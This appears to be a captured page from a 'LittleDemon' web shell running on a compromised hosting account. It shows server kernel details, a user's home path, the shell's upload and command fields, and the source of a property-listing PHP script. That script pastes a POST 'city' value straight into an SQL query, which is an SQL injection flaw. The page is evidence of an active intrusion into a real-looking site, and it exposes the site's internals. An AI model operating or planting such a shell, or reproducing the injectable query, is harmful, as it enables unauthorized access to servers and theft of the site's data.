LittleDemon WebShell


Linux in-mum-web1499.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
Path : /home/u901718425/public_html/php/
File Upload :
Command :
Current File : /home/u901718425/public_html/php/mapcard.php

<?php 
include("../panel/globale.php");
include('../widgets/cards-v2.php');
$sql = 'SELECT * FROM new_property WHERE lat !="" AND lon!="" AND status = 1 ';
if(isset($_POST['city']) && $_POST['city'] !=""){
    $sql .= ' AND city LIKE "%'.$_POST['city'].'%" OR address LIKE "%'.$_POST['city'].'%" ';
}else{
    $sql .= ' AND city="'.$_SESSION['locations']['city'].'" ';
    
}
$res = $db->query($sql);
if($res[0] == 'success'){
   card($res[1],$db,"horizental");
}

?>

LittleDemon - FACEBOOK
[ KELUAR ]